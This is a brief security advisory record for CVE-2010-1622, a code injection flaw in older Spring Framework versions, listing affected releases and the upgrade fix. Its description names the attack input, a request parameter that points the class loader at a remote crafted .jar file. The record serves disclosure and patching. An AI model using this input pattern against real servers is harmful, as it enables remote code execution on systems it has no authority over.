CVE-2010-1622

Improper Control of Generation of Code ('Code Injection') in maven/org.springframework/spring

Identifiers

GHSA-vpr3-f594-mg5g, CVE-2010-1622

Package Slug

maven/org.springframework/spring

Vulnerability

Improper Control of Generation of Code ('Code Injection')

Description

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

Affected Versions

All versions starting from 2.5.0 up to 2.5.6, all versions starting from 3.0.0 up to 3.0.2

Solution

Upgrade to versions 2.5.7, 3.0.3 or above.

Last Modified

2022-06-19

source